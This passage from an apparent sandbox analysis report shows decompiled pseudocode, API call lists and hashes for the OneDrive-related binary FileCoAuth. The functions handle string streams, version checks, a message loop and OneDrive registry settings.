    								goto L18;
    							}
    						}
    					} else {
    						_t76 =  *(_t103 - 0x14);
    						while(1) {
    							__eflags = _t76;
    							if(_t76 == 0) {
    								break;
    							}
    							_t78 =  *( *((intOrPtr*)( *_t102 + 4)) + _t102 + 0x40) & 0x0000ffff;
    							__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t78);
    							__eflags = 0xffff - (_t78 & 0x0000ffff);
    							if(0xffff != (_t78 & 0x0000ffff)) {
    								_t76 =  *(_t103 - 0x14) - 1;
    								 *(_t103 - 0x14) = _t76;
    								continue;
    							} else {
    								_t82 = _t82 | 0x00000004;
    								__eflags = _t82;
    								 *(_t103 - 0x1c) = _t82;
    							}
    							break;
    						}
    						__eflags = _t82;
    						if(_t82 != 0) {
    							L18:
    							_t71 =  *(_t103 - 0x14);
    							while(1) {
    								__eflags = _t71;
    								if(_t71 == 0) {
    									goto L25;
    								}
    								_t73 =  *( *((intOrPtr*)( *_t102 + 4)) + _t102 + 0x40) & 0x0000ffff;
    								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t73);
    								__eflags = 0xffff - (_t73 & 0x0000ffff);
    								if(0xffff != (_t73 & 0x0000ffff)) {
    									_t71 =  *(_t103 - 0x14) - 1;
    									 *(_t103 - 0x14) = _t71;
    									continue;
    								} else {
    									_t82 = _t82 | 0x00000004;
    								}
    								goto L25;
    							}
    						} else {
    							goto L14;
    						}
    					}
    					L25:
    					_t60 =  *((intOrPtr*)( *_t102 + 4));
    					 *((intOrPtr*)(_t60 + _t102 + 0x20)) = 0;
    					 *((intOrPtr*)(_t60 + _t102 + 0x24)) = 0;
    					 *((intOrPtr*)(_t103 - 4)) = 0;
    				} else {
    					_t82 = 4;
    				}
    				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t82, 0);
    				E00E97ED1(_t60, _t103 - 0x28);
    				return E00EA313E(_t102);
    			}

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E99F92
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,0000001C,00E9A77B,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A01C
    • ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(?,?,00000000,00000000,0000001C,00E9A77B,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A052
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,00EB1B1C,00000002,00000001), ref: 00E9A077
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000,?,00EB1B1C,00000002,00000001), ref: 00E9A0E4
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?setstate@?$basic_ios@_?sputn@?$basic_streambuf@_H_prolog3_catch
    • String ID:
    • API String ID: 1687759287-0
    • Opcode ID: 4ccaec86c9cb655ff170184475237e222f0514143a3a17a8686bc50dc39c5a58
    • Instruction ID: 756c82be18d639b570449104dbe5f790771c907a8a86ff9cf9dd519cc74fdb77
    • Opcode Fuzzy Hash: 4ccaec86c9cb655ff170184475237e222f0514143a3a17a8686bc50dc39c5a58
    • Instruction Fuzzy Hash: 10414434A002058FCF20DF99C5849BDBBF1FF58308B68506DE546EB292D632EE41CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 83%
    			E00EA27F2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				short _t33;
    				short _t38;
    				signed short _t46;
    				intOrPtr _t49;
    				void* _t51;
    				void* _t59;
    				void* _t73;
    				short* _t79;
    				void* _t80;
    
    				_t67 = __edi;
    				_push(0x3c);
    				E00EA3194(E00EA577A, __ebx, __edi, __esi);
    				_t79 =  *(_t80 + 8);
    				_t82 = _t79[0xa] - 8;
    				if(_t79[0xa] < 8) {
    					_t33 = _t79;
    				} else {
    					_t33 =  *_t79;
    				}
    				E00E94E9D(_t80 - 0x40, _t33);
    				 *(_t80 - 4) = 0;
    				_push(0);
    				_push(_t80 - 0x40);
    				 *((intOrPtr*)(_t80 - 0x48)) = E00EA2935(0, _t67, _t79, _t82);
    				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
    				E00E94307(_t80 - 0x40, 1, 0);
    				_t83 = _t79[0xa] - 8;
    				if(_t79[0xa] < 8) {
    					_t38 = _t79;
    				} else {
    					_t38 =  *_t79;
    				}
    				E00E94E9D(_t80 - 0x40, _t38);
    				 *(_t80 - 4) = 1;
    				E00EA2935(0, 1, _t79, _t83);
    				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
    				E00E94307(_t80 - 0x40, 1, 0);
    				E00E94E9D(_t80 - 0x28,  *0xeb0070);
    				 *(_t80 - 4) = 2;
    				E00E95904(_t80 - 0x28, _t79, 0, 0xffffffff);
    				_t46 =  >=  ?  *((void*)(_t80 - 0x28)) : _t80 - 0x28;
    				__imp__RegDeleteKeyExW(0x80000001, _t46, 0x1010b, 0, _t80 - 0x40, 1);
    				_t59 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
    				_t73 =  <=  ? RegOpenKeyExW(0x80000001,  *0xeb007c, 0, 0x1010b, _t80 - 0x44) : _t48 & 0x0000ffff | 0x80070000;
    				if(_t73 >= 0) {
    					if(_t79[0xa] >= 8) {
    						_t79 =  *_t79;
    					}
    					_t73 =  <=  ? RegDeleteValueW( *(_t80 - 0x44), _t79) : _t53 & 0x0000ffff | 0x80070000;
    					RegCloseKey( *(_t80 - 0x44));
    				}
    				E00EA298F();
    				_t49 =  *((intOrPtr*)(_t80 - 0x48));
    				_t74 =  !=  ? _t59 : _t73;
    				_t75 =  !=  ? _t49 :  !=  ? _t59 : _t73;
    				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
    				E00E94307(_t80 - 0x28, 1, 0);
    				_t51 =  !=  ? _t49 :  !=  ? _t59 : _t73;
    				return E00EA3152(_t59,  !=  ? _t49 :  !=  ? _t59 : _t73, _t79);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA27F9
    • RegDeleteKeyExW.ADVAPI32(80000001,?,0001010B,00000000,?,00000000,000000FF,00000001,00000000,?,00000001,?,00000001,00000000,?,00000000), ref: 00EA28A2
    • RegOpenKeyExW.ADVAPI32(80000001,00000000,0001010B,?,?,?,?,?,?,0000003C), ref: 00EA28C8
    • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,0000003C), ref: 00EA28EC
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0000003C), ref: 00EA2903
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Delete$CloseH_prolog3_OpenValue
    • String ID:
    • API String ID: 1242867327-0
    • Opcode ID: 8bafb4d32f36c8a5796d53a6a97026ef0f4202bb37855c9c786c3068adf46145
    • Instruction ID: 2cec295c324d7d67603f3c3cb42fa2b379e230204f44a08e380d6153735c77a2
    • Opcode Fuzzy Hash: 8bafb4d32f36c8a5796d53a6a97026ef0f4202bb37855c9c786c3068adf46145
    • Instruction Fuzzy Hash: 9C314E71900204DBDB10EFA9CC89EDEBBF9EF4A710F101619F552BB190DB34AA46CB60
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 31%
    			E00EA12BB(void* __edx, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, short _a20, intOrPtr _a24) {
    				signed int _v8;
    				void _v270;
    				struct _OSVERSIONINFOEXW _v292;
    				void* __esi;
    				signed int _t22;
    				void* _t36;
    				void* _t44;
    				void* _t45;
    				intOrPtr* _t47;
    				signed int _t48;
    
    				_t44 = __edx;
    				_t22 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t22 ^ _t48;
    				_v292.dwOSVersionInfoSize = 0x11c;
    				_v292.dwMajorVersion = 0;
    				_v292.szCSDVersion = 0;
    				_v292.dwMinorVersion = 0;
    				_v292.dwBuildNumber = 0;
    				_v292.dwPlatformId = 0;
    				memset( &_v270, 0, 0xfe);
    				_v292.wSuiteMask = 0;
    				_v292.wServicePackMajor = 0;
    				_t47 = __imp__VerSetConditionMask;
    				 *_t47(0, 0, 2, _a8, 1, _a16, 0x20, _a24);
    				 *_t47(0, _t44);
    				 *_t47(0, _t44);
    				_v292.dwMajorVersion = _a4 & 0x0000ffff;
    				_v292.dwMinorVersion = _a12 & 0x0000ffff;
    				_v292.wServicePackMajor = _a20;
    				VerifyVersionInfoW( &_v292, 0x23, 0);
    				asm("sbb eax, eax");
    				return E00EA29F2(_t36, _v8 ^ _t48, _t44, _t45, _t47, _t44);
    			}

    APIs
    • memset.MSVCR120 ref: 00EA130B
    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?,00000001,?,00000020,?), ref: 00EA1332
    • VerSetConditionMask.KERNEL32(00000000), ref: 00EA1336
    • VerSetConditionMask.KERNEL32(00000000), ref: 00EA133A
    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00EA1366
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ConditionMask$InfoVerifyVersionmemset
    • String ID:
    • API String ID: 375572348-0
    • Opcode ID: 5899916f07db2301d12f2ee8ba35f19f3f676c45f985d13b44b567b0c4972498
    • Instruction ID: 96065bcf21d89a59913f702509909356e0e74ed35ca0293691c54596d2fe772c
    • Opcode Fuzzy Hash: 5899916f07db2301d12f2ee8ba35f19f3f676c45f985d13b44b567b0c4972498
    • Instruction Fuzzy Hash: 80215E71D4022CAFCB24DF65DC46BEA7BB8EF49710F00819AB548E7280D6749A948FD0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 93%
    			E00E9330A(intOrPtr __ecx, void* __edx, void* __edi) {
    				signed int _v8;
    				struct tagMSG _v36;
    				void* __ebx;
    				void* __esi;
    				signed int _t7;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    				signed int _t28;
    				void* _t32;
    
    				_t26 = __edi;
    				_t25 = __edx;
    				_t7 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t7 ^ _t28;
    				_t27 = E00E93696(__ecx, __ecx);
    				if(_t27 != 0) {
    					L4:
    					if(_t32 < 0) {
    						L7:
    						return E00EA29F2(0, _v8 ^ _t28, _t25, _t26, _t27);
    					}
    					L5:
    					_t27 = E00E93A97();
    					if( *0xeb1824 != 0) {
    						Sleep( *0xeb1820);
    					}
    					goto L7;
    				}
    				if(GetMessageW( &_v36, 0, 0, 0) <= 0) {
    					goto L5;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					TranslateMessage( &_v36);
    					DispatchMessageW( &_v36);
    				} while (GetMessageW( &_v36, 0, 0, 0) > 0);
    				_t32 = _t27;
    				goto L4;
    			}

    APIs
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E93333
    • TranslateMessage.USER32(?), ref: 00E93341
    • DispatchMessageW.USER32 ref: 00E9334B
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E93358
    • Sleep.KERNEL32(?,00000000), ref: 00E9337C
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Message$DispatchSleepTranslate
    • String ID:
    • API String ID: 3237117195-0
    • Opcode ID: 2aec729f22f5cc442d093732a515c707c27ef31f5e3dad3e8bc42ad4f7a164c2
    • Instruction ID: 34e4ee46a6793c4be3e8622fb6c80888c45c48ce08d7bd6659d3ef774642e3ed
    • Opcode Fuzzy Hash: 2aec729f22f5cc442d093732a515c707c27ef31f5e3dad3e8bc42ad4f7a164c2
    • Instruction Fuzzy Hash: 2A014472900228AFDF11ABB59D89DAF77ACFB09794B091559F911F3110DA25DE0887B0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 61%
    			E00E9999F(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr* _a8, signed int _a12, signed int _a16) {
    				signed int _v8;
    				intOrPtr _v20;
    				void* _t52;
    				intOrPtr _t54;
    				signed int _t55;
    				intOrPtr* _t72;
    				intOrPtr* _t82;
    				intOrPtr _t84;
    				signed int _t85;
    				intOrPtr* _t88;
    				signed int _t89;
    				signed int _t92;
    				intOrPtr* _t93;
    				void* _t99;
    				intOrPtr* _t102;
    
    				_t97 = __edi;
    				_t80 = __ebx;
    				_push(__ebx);
    				_push(__esi);
    				_t102 = __ecx;
    				_push(__edi);
    				_t84 =  *((intOrPtr*)(__ecx + 0x10));
    				if(_t84 < _a4) {
    					L31:
    					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
    					asm("int3");
    					_push(4);
    					_t52 = E00EA3161(E00EA3D0C, _t80, _t97, _t102);
    					_t85 = _a4;
    					_v20 = _t85;
    					_v8 = _v8 & 0x00000000;
    					if(_t85 != 0) {
    						_t52 = E00E9A1D7(_t85, _a8);
    					}
    					return E00EA313E(_t52);
    				} else {
    					_t80 = _a8;
    					_t92 = _a12;
    					_t54 =  *((intOrPtr*)(_t80 + 0x10));
    					if(_t54 < _t92) {
    						goto L31;
    					} else {
    						_t55 = _t54 - _t92;
    						_t99 =  <  ? _t55 : _a16;
    						if((_t55 | 0xffffffff) - _t84 <= _t99) {
    							__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
    						}
    						if(_t99 != 0) {
    							_a16 = _t84 + _t99;
    							if(E00E94D8F(_t80, _t102, _t99, _t84 + _t99, 0) != 0) {
    								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    									_a8 = _t102;
    								} else {
    									_a8 =  *_t102;
    								}
    								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    									_t93 = _t102;
    								} else {
    									_t93 =  *_t102;
    								}
    								E00E94B32(_t93 + (_a4 + _t99) * 2, _a8 + _a4 * 2,  *(_t102 + 0x10) - _a4);
    								if(_t102 != _t80) {
    									if( *((intOrPtr*)(_t80 + 0x14)) >= 8) {
    										_t80 =  *_t80;
    									}
    									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    										_t88 = _t102;
    									} else {
    										_t88 =  *_t102;
    									}
    									E00E942E3(_t88 + _a4 * 2, _t80 + _a12 * 2, _t99);
    								} else {
    									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    										_a8 = _t102;
    									} else {
    										_a8 =  *_t102;
    									}
    									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    										_t82 = _t102;
    									} else {
    										_t82 =  *_t102;
    									}
    									_t91 =  <  ? _a12 + _t99 : _a12;
    									E00E94B32(_t82 + _a4 * 2, _a8 + ( <  ? _a12 + _t99 : _a12) * 2, _t99);
    								}
    								_t89 = _a16;
    								 *(_t102 + 0x10) = _t89;
    								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
    									_t72 = _t102;
    								} else {
    									_t72 =  *_t102;
    								}
    								 *((short*)(_t72 + _t89 * 2)) = 0;
    							}
    						}
    						return _t102;
    					}
    				}
    			}

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99927,00000000,BB40E64E,00000000,000000FF,00000000,?,?,00E912F1,?,00000000), ref: 00E999DE
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99927,00000000,BB40E64E,00000000,000000FF,00000000,?,?,00E912F1,?,00000000), ref: 00E99AD1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@
    • String ID: invalid string position$string too long
    • API String ID: 737550999-4289949731
    • Opcode ID: 930212bc5f5d6a8adb430c2bc03d72984f642b3f3f00314ed91c6358072849ff
    • Instruction ID: 4d6c7ae85d8c642e650035419496ac6a6faa33555e8dfeec6de86dc60e48544a
    • Opcode Fuzzy Hash: 930212bc5f5d6a8adb430c2bc03d72984f642b3f3f00314ed91c6358072849ff
    • Instruction Fuzzy Hash: 0B416F71200209DFCF24CF5CD88499A73FAFF89744720592EE856AB252DBB0E955CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 91%
    			E00E9E0B1(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
    				void* _t46;
    				void* _t53;
    				intOrPtr _t88;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t94;
    
    				_t94 = __eflags;
    				E00EA3194(E00EA4AD0, __ebx, __edi, __esi);
    				_t91 = __ecx;
    				_t88 =  *((intOrPtr*)(_t93 + 8));
    				_t70 =  *((intOrPtr*)(_t93 + 0xc));
    				E00E953DD(_t93 - 0x174, _t88, __ecx, _t94);
    				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
    				 *((intOrPtr*)( *_t91 + 0x14))(_t88, _t93 - 0x174, 0x168);
    				_push("\\");
    				_push(0xeb1368);
    				_push(_t93 - 0x28);
    				_t46 = E00E997F4( *((intOrPtr*)(_t93 + 0xc)), _t88, _t91, _t94);
    				 *(_t93 - 4) = 1;
    				E00E95758(_t91, _t93 - 0x58, _t46, _t88);
    				 *(_t93 - 4) = 3;
    				E00E94307(_t93 - 0x28, 1, 0);
    				E00E94E9D(_t93 - 0x40, L"UserFolder");
    				 *(_t93 - 4) = 4;
    				_t53 = E00E9F5DC(0x80000001, _t93 - 0x58, _t93 - 0x40,  *((intOrPtr*)(_t93 + 0xc)), 0, 0);
    				_t92 = _t53;
    				 *(_t93 - 4) = 3;
    				E00E94307(_t93 - 0x40, 1, 0);
    				if(_t53 >= 0 &&  *((char*)(_t93 - 0x12c)) == 0) {
    					E00E94E9D(_t93 - 0x28, L"UserFolder");
    					 *(_t93 - 4) = 5;
    					E00E94E9D(_t93 - 0x40, L"Software\\Microsoft\\OneDrive");
    					 *(_t93 - 4) = 6;
    					E00E9F5DC(0x80000001, _t93 - 0x40, _t93 - 0x28, _t70, 0, 0);
    					 *(_t93 - 4) = 5;
    					E00E94307(_t93 - 0x40, 1, 0);
    					 *(_t93 - 4) = 3;
    					E00E94307(_t93 - 0x28, 1, 0);
    				}
    				E00E94E9D(_t93 - 0x28, L"OneDrive");
    				 *(_t93 - 4) = 7;
    				E00E9F679(_t93 - 0x28, _t70);
    				 *(_t93 - 4) = 3;
    				E00E94307(_t93 - 0x28, 1, 0);
    				 *(_t93 - 4) = 0;
    				E00E94307(_t93 - 0x58, 1, 0);
    				 *(_t93 - 4) =  *(_t93 - 4) | 0xffffffff;
    				E00E94681(_t93 - 0x174);
    				return E00EA3152(0, 0, _t92);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9E0BB
      • Part of subcall function 00E953DD: __EH_prolog3.LIBCMT ref: 00E953E4
      • Part of subcall function 00E997F4: __EH_prolog3.LIBCMT ref: 00E997FB
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9F5DC: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F60F
      • Part of subcall function 00E9F5DC: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000008,?), ref: 00E9F655
      • Part of subcall function 00E9F5DC: RegCloseKey.ADVAPI32(00000000), ref: 00E9F660
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3$??3@CloseCreateH_prolog3_Value
    • String ID: OneDrive$Software\Microsoft\OneDrive$UserFolder
    • API String ID: 654568077-2333273078
    • Opcode ID: e613a183ce01bc2194a98bdb6fa012277e881289f945c99e507f62828438e318
    • Instruction ID: f964312f0ecc6938c209e9d8d63dea0df598385fb8ef6a9af2b52434d7d6dec2
    • Opcode Fuzzy Hash: e613a183ce01bc2194a98bdb6fa012277e881289f945c99e507f62828438e318
    • Instruction Fuzzy Hash: 70413DB1800288EADF11E7E0CD59FDEBBB8AF59704F441198F105BB1C2DBB05A49C761
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 75%
    			E00E9CC43(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t35;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t58;
    				short* _t79;
    				intOrPtr _t81;
    				void* _t82;
    
    				_t35 = E00EA3194(E00EA4683, __ebx, __edi, __esi);
    				_t58 = __ecx;
    				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
    				_t81 = __ecx + 0x40;
    				 *(_t82 - 0x30) =  *(_t82 - 0x30) & 0x00000000;
    				_t79 =  *((intOrPtr*)(_t82 + 8));
    				 *((intOrPtr*)(_t82 - 0x40)) = _t79;
    				 *((intOrPtr*)(_t82 - 0x2c)) = _t81;
    				__imp___Mtx_lock(_t81, 0x34);
    				E00E9E349(_t35);
    				 *(_t82 - 4) = 1;
    				 *(_t79 + 0x10) =  *(_t79 + 0x10) & 0x00000000;
    				 *((intOrPtr*)(_t79 + 0x14)) = 7;
    				 *_t79 = 0;
    				 *(_t82 - 0x30) = 1;
    				 *((intOrPtr*)( *_t58 + 0x18))(_t79);
    				 *((intOrPtr*)( *_t58))(_t82 - 0x28);
    				 *(_t82 - 4) = 2;
    				if(E00E99650(_t82 - 0x28, 0,  *((intOrPtr*)(_t82 - 0x18)), L"Personal", E00E94E74(L"Personal")) == 0 || E00E99650(_t82 - 0x28, 0,  *((intOrPtr*)(_t82 - 0x18)), 0xea7340, E00E94E74(0xea7340)) == 0) {
    					 *((intOrPtr*)( *_t58 + 0x10))(_t82 - 0x3c);
    					 *(_t82 - 4) = 3;
    					_push( *((intOrPtr*)(_t82 - 0x2c)));
    					_t46 = E00E9AE61( *((intOrPtr*)(_t82 - 0x3c)),  *((intOrPtr*)(_t82 - 0x38)));
    					if(_t46 !=  *((intOrPtr*)(_t82 - 0x38)) && _t79 != _t46) {
    						E00E94BDD(_t79, _t46, 0, 0xffffffff);
    					}
    					 *(_t82 - 4) = 2;
    					E00E949AF(_t82 - 0x3c);
    				} else {
    					_t55 = _t82 - 0x28;
    					if(_t79 != _t82 - 0x28) {
    						E00E94BDD(_t79, _t55, 0, 0xffffffff);
    					}
    				}
    				 *(_t82 - 4) = 1;
    				_t48 = E00E94307(_t82 - 0x28, 1, 0);
    				 *(_t82 - 4) = 0;
    				__imp___Mtx_unlock(_t81);
    				E00E9E349(_t48);
    				return E00EA3152(_t58, _t79, _t81);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CC4A
    • _Mtx_lock.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00E9CC66
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00E99650: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00E9946E,00000000,?,?,?), ref: 00E99664
    • _Mtx_unlock.MSVCP120(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00E9CD4E
      • Part of subcall function 00E94BDD: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000007,?,?,?,00E94E2B,?,00000007,BB40E64E,00000007,?,?,?,00E94EC9,00000007,00000000), ref: 00E94BF9
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xout_of_range@std@@$C_error@std@@H_prolog3_Mtx_lockMtx_unlockThrow_
    • String ID: Personal
    • API String ID: 2696486361-150736850
    • Opcode ID: f2610c15be37021dfada0d847e44b54031a9eae47f942f0346cae6ddcd430cb0
    • Instruction ID: e43c0a5f7a73b24040e6190dbb8fb5a50511c3a3186112aba7df7d24f33af877
    • Opcode Fuzzy Hash: f2610c15be37021dfada0d847e44b54031a9eae47f942f0346cae6ddcd430cb0
    • Instruction Fuzzy Hash: 2B31A171A00209EFDF04EBA4D846FEDBBB4AF09314F142059F101BB2D2DB74AA45CB21
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 80%
    			E00E9CDC2(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t28;
    				void* _t31;
    				void* _t36;
    				intOrPtr* _t47;
    				intOrPtr _t62;
    				intOrPtr _t64;
    				void* _t65;
    				void* _t66;
    
    				_t66 = __eflags;
    				_t28 = E00EA3194(E00EA470E, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t65 - 0x130)) = __ecx;
    				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
    				_t64 = __ecx + 0x40;
    				 *(_t65 - 0x138) =  *(_t65 - 0x138) & 0x00000000;
    				_t62 =  *((intOrPtr*)(_t65 + 8));
    				 *((intOrPtr*)(_t65 - 0x140)) = _t62;
    				 *((intOrPtr*)(_t65 - 0x13c)) = _t64;
    				__imp___Mtx_lock(_t64, 0x134);
    				E00E9E349(_t28);
    				 *(_t65 - 4) = 1;
    				E00EA122E(_t65 - 0x134);
    				 *(_t65 - 4) = 2;
    				_t31 = E00EA1237(__ebx, _t65 - 0x134, __edx, _t62, _t64, _t66);
    				E00E94E9D(_t62, L"Personal");
    				_t67 = _t31;
    				 *(_t65 - 0x138) = 1;
    				_t47 =  *((intOrPtr*)(_t65 - 0x130));
    				if(_t31 != 0) {
    					 *((intOrPtr*)( *_t47 + 0x18))(_t62);
    				}
    				E00E953DD(_t65 - 0x12c, _t62, _t64, _t67);
    				 *(_t65 - 4) = 3;
    				_push(_t65 - 0x12c);
    				if( *((intOrPtr*)( *_t47 + 0xc))() != 0) {
    					_t40 = _t65 - 0x12c;
    					if(_t62 != _t65 - 0x12c) {
    						E00E94BDD(_t62, _t40, 0, 0xffffffff);
    					}
    					_t57 = _t47 + 0x28;
    					if(_t47 + 0x28 != _t62) {
    						E00E94BDD(_t57, _t62, 0, 0xffffffff);
    					}
    				}
    				 *(_t65 - 4) = 2;
    				_t36 = E00E94681(_t65 - 0x12c);
    				 *(_t65 - 4) = 1;
    				 *((intOrPtr*)(_t65 - 0x134)) = 0xea68d4;
    				 *(_t65 - 4) = 0;
    				__imp___Mtx_unlock(_t64);
    				E00E9E349(_t36);
    				return E00EA3152(_t47, _t62, _t64);
